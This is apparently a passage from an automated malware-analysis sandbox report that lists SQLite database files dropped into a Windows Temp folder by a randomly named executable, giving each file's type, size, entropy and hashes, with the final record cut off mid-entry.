                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\bdxLfTwyps

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\cgeHCBjRWj

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\drjNkhM0zZ

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\e4asmUBmlB

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\eE33OM61rM

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\eb88F7UpkY

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\elVVlWNYaA

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\f4VaxqTA7A

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.8439810553697228
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                    MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                    SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                    SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                    SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\fH7Gn5H4cs

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\fHroCvhqBk

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\fJMK7dguTn

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.8439810553697228
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                    MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                    SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                    SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                    SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\fP8TKvwtbT

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.8439810553697228
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                    MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                    SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                    SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                    SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\gE8WDfj00B

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\gOZ7h2Wxig

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\gXJeJiiTwJ

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\gcc7lB48Sh

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\gnaQagbAdh

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\gvAKM0fLhk

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\gy0VJgFm03

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\gzTU2seUsB

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\hGHNxaocx4

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.8439810553697228
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                    MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                    SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                    SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                    SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\hRv5QB5tNv

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\hrKTuY7HvJ

                                                                    Download File
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
